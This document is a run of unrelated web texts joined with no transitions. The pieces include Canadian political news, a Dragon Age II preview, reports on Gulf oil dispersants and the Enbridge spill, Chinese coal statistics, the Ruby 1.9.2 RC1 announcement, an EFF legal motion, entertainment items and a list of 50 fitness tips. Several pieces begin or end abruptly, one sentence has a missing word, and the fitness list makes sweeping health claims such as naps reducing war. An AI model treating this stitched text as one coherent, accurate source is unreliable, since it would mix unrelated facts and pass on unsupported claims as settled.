Liberal MP and public safety critic Mark Holland was furious that Toews taunted him about supporting a pardon for Homolka — only minutes before the two men were scheduled to meet to discuss ways to split the bill precisely so as to prevent a Homolka pardon .
“ The level of dishonesty is so disgusting , ” Holland fumed .
“ Do these people have no bottom ?
Do they have no low to which they will not go ? ”
Dragon Age II takes a page from the Mass Effect playbook , limiting player characters to a male or female human version of the game 's main character , Hawke .
Advertisement
In Dragon Age : Origins , players could choose from four different races and three different character classes , with each combination coming complete with its own playable origin story .
Dragon Age II is not Dragon Age : Origins .
Advertisement
Instead of multiple origins , there is only one .
From the official press release :
" Dragon Age 2 thrusts players into the role of Hawke , a penniless refugee who rises to power to become the single most important character in the world of Dragon Age .
Known to be a survivor of the Blight and the Champion of Kirkwall , the legend around Hawke 's rise to power is shrouded in myth and rumor .
Featuring an all - new story spanning 10 years , players will help tell that tale by making tough moral choices , gathering the deadliest of allies , amassing fame and fortune , and sealing their place in history .
The way you play will write the story of how the world is changed forever . "
BioWare 's Chris Priestly confirms on the forums that , like Commander Shepard from the Mass Effect series , players will be able to create either a male or female Hawke .
Like Mass Effect , this should allow for a deeper story , while allowing characters to refer to the main character by name .
I 'm sure emotional engagement has something to do with it as well .
Like many fans in the forums , this decision rubs me the wrong way .
While I enjoyed playing my own Commander Shepard in Mass Effect , my Dragon Age character felt much more like an extension of myself than Shepard did , even if it was a female elf .
Advertisement
Multiple races in DA2 ?
[ BioWare Forums - Thanks Chris ! ]
The heavy use of dispersants in the gulf oil spill is unprecedented and troublesome , two top Obama administration officials told a Senate subcommittee on Thursday .
But use of the dispersants has been sharply reduced in recent weeks .
Lisa P. Jackson , administrator of the Environmental Protection Agency , said the daily use of dispersants is down 72 percent since May 26 , when her agency and the Coast Guard told BP to use dispersant on the gulf ’s surface only as a last resort .
“ Every single thing we have done out at sea comes at some risk , ’’ Ms. Jackson told the Commerce , Justice , Science and Related Agencies subcommittee of the Appropriations Committee .
The subcommittee chairwoman , Senator Barbara Mikulski , Democrat of Maryland , said she wanted assurances that dispersants would not become the “ Agent Orange of this oil spill , ” with “ vile consequences . ”
Agent Orange was a herbicide dropped by American forces during the Vietnam War to kill trees and plants so soldiers could spot enemy guerrillas ; studies have found an increased incidence of certain cancers and other diseases among Americans and Vietnamese who were exposed to it .
“ Dispersants have been used in the Gulf of Mexico for 15 years , ” Ms. Jackson said .
“ But it ’s the volume that any average person , whether they have a chemistry degree or not , ” would be concerned about , she said .
Dispersants are supposed to break up the oil into smaller droplets that naturally occurring microbes can digest , Ms. Jackson said , and “ the microbes are thriving . ”
Should the microbes overproliferate , they could use up the dissolved oxygen in the water , leading to mass fish kills , she said , but so far , levels of dissolved oxygen are acceptable .
And if the well is successfully capped , that would mean not only an end to oil flowing into the gulf but also an end to dispersant use , she said .
Larry Robinson , the assistant secretary of commerce for oceans and atmosphere , testified that dispersants had not been found in fish or shellfish samples .
The dispersants are intended to persist long enough to do their job and then to break down .
The largest concentrated solar power ( CSP ) plant in the Middle East is to be built in Madinat Zayed , approximately 120 km ( 75 miles ) southwest of Abu Dhabi in the United Arab Emirates ( UAE ) .
When it becomes operational in 2012 , the plant , dubbed Shams 1 , will feature some 6,300,000 square - feet of solar parabolic collectors , cover 741 acres of desert and will produce enough electricity to power 62,000 households .
With a capacity of approximately 100MW and a solar field consisting of 768 parabolic trough collectors , Sham 1 represents one of the first steps in the region towards the introduction of sustainable energy sources in an energy market which until now has depended mostly on hydrocarbons .
It is expected to displace approximately 175,000 tonnes of CO2 per year , equivalent to planting 1.5 million trees or removing 15,000 cars from Abu Dhabi ’s roads .
The plant will generate solar thermal electricity through focused sunlight , concentrated by the plant ’s parabolic trough collectors , heating a coolant which then generates high - pressure steam that drives a conventional steam turbine .
The same technology is being implemented in large - scale commercial solar thermal power stations in Spain and northern Africa .
How the Shams 1 CSP station works
Shams ( which is Arabic for sun ) 1 will be built , owned and operated by a consortium including Masdar , an Abu Dhabi renewable energy company , Abengoa Solar , a technology company that will supply the parabolic trough collectors , and Total , one of the world ’s major oil and gas groups .
Masdar will own a 60 percent share of the plant , while an Abengoa Solar and Total joint venture will own the other 40 per cent .
The plant will directly contribute towards Abu Dhabi ’s target of achieving seven percent renewable energy power generation capacity by 2020 and has been approved for a solar incentive premium in the form of a long term Green Power Agreement by the Abu Dhabi Government which will see electricity generated by the plant sold to the Abu Dhabi Water and Electricity Company ( ADWEC ) under a long - term electricity sales contract .
Construction of Shams 1 will commence in mid 2010 , and it is due to go on line in 2012 .
Data
Data are taken from the 2010 BP statistical review of world energy - both a priceless but flawed resource .
BP provide annual coal production figures in tonnes and tonnes oil equivalent ( TOE ) from 1981 and consumption figures in TOE only from 1965 .
Hence to make a production / consumption balance comparison it is necessary to use TOE .
In China , 1 TOE is close to 2 tonnes coal - so simply double the TOE numbers to get at the approximate tonnages .
Note that the energy content of coal varies by rank and from region to region and conversion factors to TOE vary from 1.5 to 3 .
The coal monster
Like everything else in China , coal production statistics are simply immense .
China now consumes and produces close to 50 % of all the coal in the world .
Thus , changes in Chinese consumption and / or production may have a dramatic impact upon the global coal market .
Figure 2 Since 1965 , China has steadily increased its percentage share of global coal consumption and looks set to account for 50 % of global coal consumption this year .
Virtually all consumption is met from Chinese domestic coal production ( Figure 3 )
Coal production and consumption are in balance
In light of press stories describing rapid growth in Chinese coal imports , I was both surprised and puzzled when I plotted the Chinese coal production and consumption data and saw that these have always been roughly in balance ( Figure 3 ) .
I sent the chart around the TOD email list and copied to Professor Dave Rutledge at Cal Tech .
It was DaveR who came up with a possible explanation .
DaveR pointed out that in countries like the UK , coal stock piles equivalent to roughly 4 months consumption are maintained .
If China does similar then stock piles will be around one third of 3 Gt equal to 1 Gt. With consumption growing at 12 % in 2009 , stock pile growth would need to be around 120 Mt to maintain the 4 month buffer .
China People 's Daily reported that Chinese net coal imports were 104 Mt in 2009 - barely sufficient to maintain stock pile growth .
Figure 3
Despite stories of ballooning coal imports , China produces as much coal as it consumes .
It seems imports merely contribute to domestic coal stock piles .
Global coal trade
The top 20 coal producers account for 98 % and the top 5 producers account for 79 % of global coal production .
It is therefore possible to get a handle on global coal trade by looking at the top few producers .
China as we have already seen is roughly in production / consumption balance , and India is a major importer of coal .
The main export nations are the USA , FSU , Australia , Indonesia and South Africa .
Looking at the production / consumption balance of these 5 nations shows an export surplus of 450 million TOE ( roughly 900 million tonnes coal ) .
Chinese coal imports of 100
Mt therefore account for roughly 11 % of global coal trade ( contrary to the People 's daily report ) - and that is just to maintain stockpiles !
Figure 4
The top 20 coal producers .
The dashed grey line marks approximate zero growth for the last decade .
All the growth in coal supplies comes from the nations above that line with growth dominated by China with contributions from India and Indonesia .
Figure 5
The global export market is dominated by 5 nations .
Export growth has come mainly from Australia and Indonesia .
Threat to global economy
Should China ever fail to match coal consumption with indigenous production then 1 of 3 things may happen .
The first option is that consumption is pegged back to match stalled production and this would stall Chinese economic growth with knock on effects to the global economy .
The second option is that China tries to meet any shortfall buying coal on the international market .
As already pointed out China is such a huge consumer of coal this would create great competition in the international market for limited supplies leading to severe upwards pressure on coal prices .
The third option is that China somehow manages to install sufficient nuclear capacity to plug any energy gap .
The People 's Daily reports a doubling of Chinese coal imports for the first 5 months of 2010 and upwards pressure on coal prices and it therefore looks like option 2 may be under way .
Should Chinese coal imports double this year and next then China will be competing for about 50 % of the coal on the world market and that may be like a wrecking ball going through the global economy that is founded on abundant and cheap supplies of energy .
Reserves and peak production
Finally a note on reserves .
BP report China to have 114.5
Gt of coal reserves .
BP in fact report coal reserves figures from the World Energy Council and the figure of 114.5
Gt has been reported every year since 1992 .
Thus we have the same unsatisfactory non-varying reserves reporting for Chinese coal that exists for Middle East OPEC crude oil reserves .
Since 1992 China has produced 31
Gt of coal and the reserves should be reduced by that amount leaving 83.5
Gt reserves as of end 2009 .
In 2006 , the German based Energy Watch Group ( 47 page pdf ) reported Chinese reserves to be 96.3 Gt .
They produced a Hubbert curve forecast scenario that has proven to be inaccurate thus far ( Fig. 6 ) .
Dave Rutledge is currently estimating 139 Gt for ultimate recovery of Chinese coal .
Cumulative production 1896 to 2009 is 51 Gt indicating 88 Gt remaining .
Figure 6 A Chinese coal production scenario produced by The Energy watch Group in 2006 ( page 28 of report linked to above ) illustrating how difficult it is to forecast production scenarios , especially pre-peak .
One possible outcome is that Chinese coal production peaks earlier than shown and then enters rapid decline .
Alternatively , substantially larger reserves may produce a taller and broader peak than shown here .
Chinese coal production will peak one day but it is very difficult to predict when that day will come based on these figures .
The indications are that China has used about 37 % of its coal .
It has to be assumed that the best resources have been mined first and that for every year that passes the challenge of first meeting and then exceeding the previous year will become increasingly difficult .
But the Chinese are an enterprising people .
Useful links
Dave Rutledge : Hubbert 's Peak , The Coal Question , and Climate Change
Richard Heinberg : China 's coal bubble ... and how it will deflate U.S. efforts to develop " clean coal "
China : Summary of Coal Industry
This info is subject to change without notice .
Check back regularly for the most up to date information .
For more info about our Minor Repair Service click here .
For more info about buying parts click here .
For more info about buying a used bike click here .
For more info about donating bikes / parts / money click here .
We are doing our best .
A former police officer convicted of lying about an encounter he had in Times Square that sent a bicyclist tumbling to the pavement will not receive any further punishment for his crime , a judge in Manhattan ruled on Wednesday .
The decision by Justice Maxwell Wiley to give the former officer , Patrick Pogan , a conditional discharge , which means he will not receive any sanctions like jail time or probation , was a lighter sentence than even Mr. Pogan ’s lawyer had requested .
The lawyer , Stuart London , had pleaded for his client to receive a conditional discharge and community service .
Prosecutors had asked for jail time and probation .
“ The court is convinced that incarceration is not appropriate in this case , ” Justice Wiley said .
The ruling was met with sobs by Mr. Pogan and his supporters , including his father , mother and companion .
In the hallway outside the courtroom , Mr. Pogan exchanged tearful embraces with more than a dozen supporters .
Mr. Pogan , 24 , who resigned from the force after the episode , thanked the police union and his lawyer as he left the courthouse .
Position : Defense
Age : 18
Date of Birth : January 7 , 1992
Place of Birth : Orleans , Ont .
Ht : 6 - 3 Wt : 195
Shoots : Right
Erik Gudbranson is currently playing for the Kingston Frontenacs of the OHL .
He helped his team to a record of 33 wins , 30 losses , 2 overtime losses , and 3 shootout losses and a # 4 seed in the playoffs .
Unfortunately , the Frontenacs were ousted in the first round .
A knee injury , and a bout with mono limited Gudbranson to only 41 games .
According to Central Scouting , Gudbranson currently sits as the top rated North American defenseman and fourth overall behind Tyler Seguin , Taylor Hall and Brett Connolly .
Gudbranson in 2009 - 10 :
GP G A PTS +/- PIM 41 2 21 23 11 68
Scouting Report ( The Scouting Report ) :
Limited to only 25 games so far , Gudbranson has still managed to show a lot of the potential he possesses in his game .
Gudbranson is a very good skater for his size , and has been a lot more involved offensively this year .
He competes hard and is n’t afraid to play physical , which are all assets that will ease his transition to the NHL .
If Gudbranson can regain his touch prior to his bout with mono when he returns , he could very well give Cam Fowler a run for the # 3 slot , but if not , he might slip a few spots as well .
Why he would fit in Columbus :
Much like Cam Fowler , Gudbranson is an offensive defenseman .
He 's only going to get better with age .
His 23 points in 41 games this past season is lightyears better compared to his previous season in 2008 - 09 ( 3-19 - 22 , 63 GP ) .
He 's already being compared to Chris Pronger , and Dion Phaneuf .
Not too shabby if you ask me .
Gudbranson in action :
Among the discarded projects of the famously fastidious Stanley Kubrick are " lost " movies about Napoleon Bonaparte , the Holocaust and the American civil war .
Now , 11 years after his death , a treatment by the legendary film - maker titled Lunatic at Large looks set to make it to the big screen , with Scarlett Johansson and Sam Rockwell attached to star .
Production Weekly broke the news on Twitter last night , reporting that the project is based on an original story by Kubrick and pulp writer Jim Thompson .
The film - maker was set to shoot the movie in the early 1960s , but withdrew after being offered the chance to direct Roman epic Spartacus by its star , Kirk Douglas .
Thompson and Kubrick 's work was completed in the late 50s , and the film is set in 1956 New York .
It centres on an ex-carnival worker with serious anger - management issues and a nervous , attractive barfly he picks up .
The movie 's central conceit is that the audience must try to work out which of the characters is an axe murderer escaped from an asylum .
Kubrick 's son- in - law , Philip Hobbs , unearthed the misplaced treatment in 1999 when rummaging through items from the late film - maker 's estate .
" I knew what it was right away , " he told the New York Times .
" Because I remember Stanley talking about Lunatic .
He was always saying he wished he knew where it was , because it was such a great idea . "
Kubrick directed 13 films during his 46 - year career , and often worked on projects that never made it to the final stage of production .
Lunatic at Large is not be the first to be completed after his death – in 2001 Steven Spielberg directed AI , Artificial Intelligence , a science - fiction tale based on Kubrick 's collaboration with writer Brian Aldiss .
According to the New York Times , Kubrick and Thompson 's treatment features scenes in which a newsboy flashes a portentous headline , and a car chases over a railroad crossing with a train bearing down .
There is also a romantic interlude in a spooky , deserted mountain lodge , and the great set piece is a night - time carnival sequence in which we encounter a number of sideshow " freaks " , including the Alligator Man , the Mule - Faced Woman , the Midget Monkey Girl and the Human Blockhead , a man with a head full of nails .
How to Selecting The Right Children ’ Knit Scarves
The Size
The Design
The Material
Whether you are buying scarves for weather or to make your kid look cool , selecting the right scarf is critical .
Knitted children scarves are always a favorite to kids due to their simplicity and a great sense of fashion .
However , to get the right scarf for your kid , there are a few things that you need to take into account .
Here are things that you should look for in a knitted scarf :
The size of the scarf is one of the critical factors that you need to consider carefully .
It will be a waste if you end up buying a scarf that is too big or too small for the kid .
If the size is too large , then it will be uncomfortable for the kid to wear .
If it is too small , then the kid will have a problem keeping to in place and could be uncomfortable as well .
However , this should be determined by the age and size of the kid .
Therefore , make sure that you have selected the right size to ensure that your kid is enjoying it .
Now that you are buying a knitted children scarves , it is also important to know that there are various types of knitting on the market .
You can go for the knit stitch , stockinette stitch , netted stitch and many other types around the market .
Each of the available kinds comes with their advantages , and you should look out for what your kid would love .
If the kid is big enough to make a decision , then you should allow them to make the decision .
Note that the kid may have a different taste from you , and thus your choice may be the same as them .
Check the material used for the making the knitted scarf is a crucial factor to consider .
Make sure that you ’ve selected the type material very carefully .
Different materials have their advantages over the rest , and thus you need to get the best the market can offer .
The material should also be determined by the reason why you are buying children scarves .
If you are buying for the weather such as winter , then you need to get woolen material or something that would offer warm enough .
But if you are buying something just make your kid look cool , then you need to get something that looks nice .
These are crucial factors that you need to consider when it comes to selecting children scarves .
With these factors , you will definitely have the best scarf for yours .
Subject : [ ANN ] Ruby 1.9.2 RC1 is out
From : " Yuki Sonoda ( Yugui ) " < yugui@ g . >
Date : Fri , 2 Jul 2010 20:01:20 +0900
-----BEGIN PGP SIGNED MESSAGE -----
Hash : SHA1 Hi , Ruby 1.9.2 RC1 has just been released .
This is a release candidate of Ruby 1.9.2 .
Ruby 1.9.2 will be mostly compatible with 1.9.1 , except the following changes : * Many new methods * New socket API ( IPv6 support ) * New encodings * Random class that supports various random number generators *
Time is reimplemented .
There is no longer the year 2038 problem .
* some regexp enhancements * $ : no longer includes the current directory .
* dl is reimplemented on top of libffi .
* new psych library that wraps libyaml .
You can use the library instead of syck .
See [ * 1 ] [ * 2 ] for more detail .
* 1 : http://svn.ruby-lang.org/repos/ruby/tags/v1_9_2_rc1/NEWS
* 2 : http://svn.ruby-lang.org/repos/ruby/tags/v1_9_2_rc1/ChangeLog
About 130 bugs has been fixed since the 1.9.2 preview 3 was released .
Major known bugs in the 1.9.2 were fixed except # 3462 .
* http://redmine.ruby-lang.org/issues/show/3462
Due to our schedule , Ruby 1.9.2 will be released in early August .
The schedule of Ruby 1.9.2 was once canceled in order to ensure that the 1.9.2 passes to RubySpec .
Now the 1.9.2 passes > 99 % of RubySpecs .
Try out the new Ruby and let us know if you have any trouble in the 1.9.2 . == Location * http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.2-rc1.tar.bz2
SIZE : 8479087 bytes MD5 : 242dcfaed8359a6918941b55d0806bf0 SHA256 : c2a680aa5472c8d04a71625 afa2b0f75c030d3655a3063fe364cfda8b33c1480 * http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.2-rc1.tar.gz
SIZE : 10779309 bytes MD5 : fdedd5b42ae89a9a46797823ad2d9acf SHA256 : 3e90036728342ce8463be00d42d4a36de70dabed96216c5f8a26ec9ba4b29537 * http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.2-rc1.zip
SIZE : 12158992 bytes MD5 : 3da59c5d3567f6e1f1697abbef71f507 SHA256 : 4f593a3d0873cea8f371a7fc7484cad7bc03acac0ada1970cb9f83a89bc27997 - -- Yuki Sonoda ( Yugui ) < yugui / yugui.jp >
-----BEGIN PGP SIGNATURE ----- Version : GnuPG v1.4.10 ( Darwin ) Comment : Using GnuPG with Mozilla - http://enigmail.mozdev.org/
New York - The Electronic Frontier Foundation ( EFF ) this week served a motion to quash dragnet subpoenas that put privacy and anonymity at risk for the operators of dozens of Internet blogs and potentially hundreds of commenters .
The subpoenas stem from a state lawsuit filed by New York residents Miriam and Michael Hersh alleging a conspiracy to interfere with their business interests .
Issued to Google and Yahoo , the subpoenas demand the identities of users of ten email accounts , operators of 30 blogs and a website that had featured discussions of the plaintiffs among other matters , and the identities of everyone who had ever commented on those sites .
" The First Amendment protects individuals ' right to speak anonymously and forces litigants to justify any attempts to unmask anonymous critics , " said EFF Senior Staff Attorney Matt Zimmerman .
" Litigants cannot forcibly identify entire communities of online speakers -- which include many speakers who no one would claim did anything wrong -- simply because the litigants are curious . "
In the motion served on Monday , EFF urged the Supreme Court for Kings County , New York , to quash the subpoenas for failing to satisfy the requirements imposed by the First Amendment , as well as the requirements imposed by New York state law and the federal Stored Communications Act .
" Overbroad subpoenas targeting anonymous speakers without cause naturally creates a chilling effect that may discourage others from exercising their constitutional rights to participate in conversations that take place online , " said Zimmerman .
" We are asking the court to enforce these reasonable safeguards so that the rights of innocent speakers do not become collateral damage in a dispute between others . "
Ron Lazebnik and the Samuelson - Glushko Intellectual Property & Information Law Clinic at Fordham University School of Law assisted EFF in the serving of this motion .
For the full motion to quash :
http://www.eff.org/files/filenode/hersh_v_cohen/UOJ-motiontoquashmemo.pdf
Contact :
Matt Zimmerman
Senior Staff Attorney
Electronic Frontier Foundation
mattz@eff.org
Michael Scott ’s resignation has been accepted .
After a series of statements by The Office star Steve Carell during the past couple of months that he will be leaving the NBC comedy series when his contract is up at the end of next season , the network confirmed his departure yesterday through primetime entertainment president Angela Bromstad .
“ Not to diminish the departure of Steve , because that will impact the show , but we have tremendous faith in the writers and actors to keep it alive , ” she told the AP .
Bromstad left open the possibility for Carell to do future guest appearances on The Office .
MARSHALL —
More than 800,000 gallons of oil have been released into a creek in Marshall that feeds the
.
Houston - based Enbridge Energy Partners said Monday that oil flowed into the Talmadge Creek and the Kalamazoo River after a leak developed in its pipeline .
Enbridge said the 30 - inch pipeline transfers about 8 million gallons of crude oil a day from Griffith , Ind. , to Sarnia , Ontario .
The leak originated from the Enbridge site , 16000 Division Drive , near the border of Marshall and Fredonia townships in central Calhoun County , according to a report
.
The pipeline crosses the Talmadge Creek about one - and - a - half miles southeast of the Kalamazoo River .
After Enbridge learned of the spill , the pipeline was shut down and isolation valves were closed , stopping the flow of oil .
Enbridge crews were on scene Monday with oil skimmers and booms on the creek and river , a press release from the company said .
Enbridge Liquids Pipelines general manager Tom Fridel said the leak was caused by a pipeline malfunction , but the cause is still being investigated , according to the Enquirer .
Enbridge and the Calhoun County Sheriff ’s Office of Emergency Management worked on the clean up into Monday night .
No one was injured in the spill .
Upstream , the Emmett Township Department of Public Safety issued an advisory against swimming or fishing in the Kalamazoo River because of the spill .
The Kalamazoo River flows west through the city of Kalamazoo , and then north and west through Allegan County .
It flows into Lake Michigan at Saugatuck .
By late afternoon , the Enquirer reported that a thick layer of oil was visible at the juncture of the creek and the Kalamazoo River , in Marshall Township .
Many small fish also washed up on the river ’s banks .
The exact time of the spill has not yet been determined , but the Enquirer quoted a Battle Creek resident who said he smelled oil at around 9 p.m. Sunday .
The Michigan Department of Natural Recourses and Environment is working on a clean up plan to address contamination , spokeswoman Mary Dettloff said .
While a barrier was put into place to stop the flow of oil , the amount of oil that got into the Kalamazoo River has yet to be determined .
Dettloff said residents along river will likely see some crude oil come onshore .
Contact Fritz Klug at
or 269-388-8553 .
Still , compared with what it could have been saying about its strategy toward news companies , Google has undersold its efforts and rarely talked about them as an overall program with a central guiding idea .
Partly this is because of the highly decentralized nature of most innovative effort at Google , which often takes place in “ 20 percent time ” — a workday per week when developers can concentrate on projects they choose themselves .
Partly it is because of the “ permanent beta ” culture at Google , in which projects are viewed as tentative and experimental long after they have reached what others would consider a mature stage .
( The company ’s wildly popular e-mail system , Gmail , officially graduated from beta - test status only last summer , after five years of operation by tens of millions of users worldwide . )
And the news organizations that are trying out experimental approaches at Google ’s suggestion and with its support have themselves chosen to be quiet .
But after talking during the past year with engineers and strategists at Google and recently interviewing some of their counterparts inside the news industry , I am convinced that there is a larger vision for news coming out of Google ; that it is not simply a charity effort to buy off critics ; and that it has been pushed hard enough by people at the top of the company , especially Schmidt , to become an internalized part of the culture in what is arguably the world ’s most important media organization .
Google ’s initiatives do not constitute a complete or easy plan for the next phase of serious journalism .
But they are more promising than what I ’m used to seeing elsewhere , notably in the steady stream of “ Crisis of the Press ” –style reports .
The company ’s ultimate ambition is in line with what most of today ’s reporters , editors , and publishers are hoping for — which is what , in my view , most citizens should also support .
That goal is a reinvented business model to sustain professional news - gathering .
This is essential if the “ crowd sourcing ” and citizen journalism that have already transformed news coverage — for instance , the videos from inside the Iranian protests last summer — are not to be the world ’s only source of information .
Accounts like those are certainly valuable , but they will be all the more significant if they are buttressed by reports from people who are paid to keep track of government agencies , go into danger zones , investigate and analyze public and private abuse , and generally serve as systematic rather than ad hoc observers .
( I am talking about what journalism should do , not what it often does . )
Google ’s likely route toward this destination , however , differs in crucial and sometimes uncomfortable ways from the one the existing news business would probably choose on its own .
The differences are natural , given the cultural chasm that separates a wildly successful , collectively cocky , engineer - dominated , very internationally staffed West Coast tech start - up from a national news establishment that is its opposite in all ways : East Coast–centric , liberal arts–heavy , less international in staff and leadership ( more Brits and Australians than in the tech industry , fewer Indians , Chinese , and Russians ) , dominated by organizations founded in the distant past , and at the moment strikingly downcast and even panicked .
Krishna Bharat
Here ’s an important illustration of the difference : people inside the press still wage bitter , first - principles debates about whether , in theory , customers will ever be willing to pay for online news , and therefore whether “ paywalls ” for online news can ever succeed .
But at Google , I could hardly interest anyone in the question .
The reaction was :
Of course people will end up paying in some form — why even talk about it ?
The important questions involved the details of how they would pay , and for what kind of news .
“ We have no horse in that race or particular model in mind , ” Krishna Bharat , one of the executives most deeply involved in Google ’s journalistic efforts , told me , in a typical comment .
His team was already working with some newspapers planning to put their content behind paywalls , others planning to remain free and hoping to become more popular with readers annoyed when paywalls crop up elsewhere , and still others planning a range of free and paid offerings .
For Bharat and his colleagues , free - versus - paid is an empirical rather than theological matter .
They ’ll see what works .
1 . Think safety first .
If you are always getting hurt no progress can be made .
2. Identify the exercises that hurt you and stop doing them .
Just because lots of people tell you an exercise is great that does n’t mean it ’s for you .
If it hurts stop .
3 . Have a clearly defined goal .
You ca n’t increase your 40 time , lose 20 pounds of fat and gain 20 pounds of muscle at the same time .
4 . Train like an athlete .
Blend dumbbells , kettlebells , bodyweight exercises and various forms of movement .
5 . Train for strength gains .
That ’s how you build muscle - by adding more weight or doing more reps .
6 . If you can avoid it do n’t train first thing in the morning .
You ’re more likely to hurt your back at that time .
If you have no other choice do an extended warm up and use caution .
It ’s best to be awake for at least an hour before lifting heavy .
7 . Train your neck .
It could save your life .
And a pencil neck looks hilarious .
8 . To spare your shoulders , elbows and wrists press with a dumbbells or a neutral / angled grip bar instead of a straight bar .
Unless you ’re a competitive lifter .
Otherwise this will keep you healthier over the long haul .
9 . Do hurdle mobility drills .
Hip mobility is very important and goes quickly as you age .
If you have good hip mobility your likelihood of having lower back problems will be reduced .
10 .
Do n’t skimp on your warm ups .
If you ’re pressed for time cut down on the main workout , not the warm up .
11 . But do n’t be “ Warm Up Man ” either .
Ya know , the guy who carries 17 different types of balls to roll on and warms up for two hours .
That ’s overkill .
A good warm up never needs to last more than ten minutes .
12 . Practice deep breathing before training .
Crocodile breathing and deep breathing in the seven month position is awesome before a workout .
13 . Squat .
It ’s an essential human movement pattern .
But you do n’t have to do it with a barbell on your back .
Just maintain the ability to do it .
Once you can , do some bodyweight squats every day .
Like right now .
Drop down and do 10 .
Then make that a habit to do randomly .
14 . Start with the goblet squat when you need load .
That ’s probably all a lot of people need .
Back and front squats can beat up fragile lifters .
It ’s rare that someone gets hurt from goblets .
15 . Do n’t underestimate the power of single leg squat variations .
You can get great size and strength gains , while sparing your spine when you focus on skater squats , reverse lunges , step ups and split squats .
16 . Make single leg RDL ’s a staple .
When done with kettlebells or dumbbells this is the safest deadlift variation you can do .
It ’s also phenomenal for the entire posterior chain .
17 .
For size gains you should feel the muscle .
Do n’t just hoist weight .
Lower under control and squeeze on the way up .
18 . Always squeeze the bell as hard as you can .
Trying to crush it , on every lift you do .
This will ensure tightness .
19 .
Squeeze your glutes tightly and brace your abs on every standing exercise .
This will help protect your spine and elicit more full body tension .
Tension equals strength .
20 .
Always maintain optimal posture throughout your sets .
Never let your shoulders slouch forward , chin poke out or your lower back round / tuck under .
21 . Do more moving and supporting on your hands .
Handstands , Power
Wheel hand walks , lateral hand walks , alligator pushups , partner assisted wheel barrow walks , and crawling are all great for building up strength and stability in the shoulders .
22 . Use thick handles or Fat Gripz .
This will strengthen the hands / grip and build up bigger forearms .
It also alleviates helps to alleviate elbow and shoulder stress .
23 .
Do n’t use excessive levels of psyche on every set .
This fries your CNS , increases the likelihood of injury and makes it harder to recover from one workout to the next .
24 . Get a sled and use it often .
Sled work is invaluable and irreplaceable when it comes to conditioning .
Get one HERE .
25 . Incorporate more static / isometric holds .
Front warrior , prone mountain , cobra pose , downward dog , up dog , supine bridge and side lunge positions from yoga are all great to do on a regular basis , either as part of your warm up , or as part of a separate mobility workout you do on off days .
Handstands and l-sits are also great for building indomitable core strength .
26 . Jump rope .
Doing so will improve your foot speed and conditioning .
Plus it ’s cool to be able to jump rope well .
27 .
Do more exercises standing than sitting or lying down .
You sit or lie down to relax .
And you spend enough time sitting at work .
Stand as often as you can when training .
28 . Pick heavy shit up off the ground .
This is a basic fundamental law of being strong .
I like kettelebell deadlifts for this purpose .
29 .
Carry heavy shit .
Exercises like farmers walks simultaneously strengthen the traps , lower back , grip , hips , knees and ankles .
They ’re tough to beat .
Some other good carries are zercher , bearhug , waiters , shouldered , and racked .
30 .
Do some pushups .
They ’re still one of the best pressing exercises there is .
If you are beyond the beginner level figure out creative ways to load them ( weight vests , plates on back , chains , bands ) or make them harder ( steep incline , 1 arm , divebomber , on rings , etc. ) .
For God ’s sake , people , stay in shape ! ”
– Louie Simmons
31 . Decrease your rest periods on small exercises .
Heed Louie ’s words .
One of the ways to do so is cut your rest periods when appropriate .
I ’m all for taking longer rest periods ( 90 - 180 seconds ) on big compound movements you ’re doing for low reps .
But when you ’re doing curls or face pulls for sets of 10 - 15 you can cut your rest periods way down .
32 . Do something active every day .
The body is meant to move everyday .
If you only strength train three days you should be out doing something active on the other days .
Even if it ’s just going for a walk or doing some mobility work to get moving .
33 .
Do n’t train for more than an hour .
Your testosterone levels will drop and cortisol levels will start climbing .
Plus , it ’s been said that if you ’re in the gym for more than an hour you ’re making friends , not making progress .
34 . Run , jump , climb , and crawl .
It ’s what your body was designed to do .
Simply lifting weights is not enough .
You have to MOVE !
35 . Eliminate loaded spinal flexion .
Your spine will thank you later .
If you ca n’t do an exercise with a neutral spine stop doing it .
Work on your mobility until you can .
36 . Listen to your body .
When you have nagging pains it ’s always better to train around them than through them .
Trust me .
37 .
Take a week off when your body needs it .
For most people that will usually come every 8 - 12 weeks .
The older and stronger you are the more often you will need down time .
38 . Take care of your knees .
You only get one pair .
39 .
Do reps to get swole .
Low reps on the big lifts are great for beginners .
They do n’t have the coordination or stabilizer strength to hold the appropriate positions for too long .
So it ’s safer to keep the reps lower and it helps them learn good habits .
When you get more advanced you need moderate to higher reps ( 6 - 10 for upper body and 8 - 15 for lower body ) to build muscle .
40 . Play .
We forget to do this as we get older .
Kids have a lot of things right .
Always remember that “ growing up ” is a trap .
Do n’t do it .
Go play something right now .
I ’ll wait .
41 . Get at least 20 minutes of sunlight per day .
Vitamin D is critically important to your health and performance and natural sunlight is the best source .
During the winter you need to at least an hour or you ’ll need to supplement with it , depending on where you live .
Of course , getting blood work done to test for a Vitamin D deficiency is the smartest approach .
42 . Perform some soft tissue work on yourself daily .
Invest in some of these to keep yourself healthy .
43 .
Do hill sprints .
They shred bodyfat , crank up your conditioning and toughen you up .
Plus Walter Payton did them which makes them awesome .
44 . Go to bed by 10:30 every night .
We are supposed to sleep when it ’s dark and wake when it ’s light .
That ’s how our bodies evolved .
Very few people do that .
That ’s why very few people are healthy and in shape .
I do n’t expect you to go to bed at 7 pm but you certainly should n’t be up til midnight staring at screens .
Turn the cell phone , TV and computer off and do your body some good .
45 . Get 8 - 9 hours of sleep .
It ’s very difficult to get bigger , faster , stronger or leaner on minimal amounts of sleep .
Sleep deprivation will also negatively effect hormone levels , mood , stress tolerance , immune function and concentration .
There is nothing more important than getting more sleep .
I repeat , there is nothing more important than getting more sleep .
For getting big , lean , strong , healthy , smarter , happier , more productive , less stressed … you name it .
46 . Get up at the same time every day .
This will help ensure optimal / consistent hormonal balance and performance levels .
You ’ll feel much better when you do this .
47 . Take naps .
It ’s an awesome way to boost recovery and get a little surge of growth hormone .
If the whole world had mandatory siestas and was forced to take naps there would be less violence , depression , divorce , war , you name it .
I truly believe that .
48 . Do yoga .
Do n’t be too much of a manly tough guy to take care of yourself .
Yoga makes you feel better .
There ’s a good reason that people have done it forever .
Follow along with THESE routines at home .
49 .
Take contrast baths or showers after training .
Hot as you can handle for 1 - 3 minutes .
Cold as you can handle for 30 - 60 seconds .
Repeat for 5 - 10 minutes .
This helps improve recovery .
50 .
Get massages .
Being dedicated to this on a regular basis over the last few years has made a tremendous difference in how I feel .
Do it as often as you can .
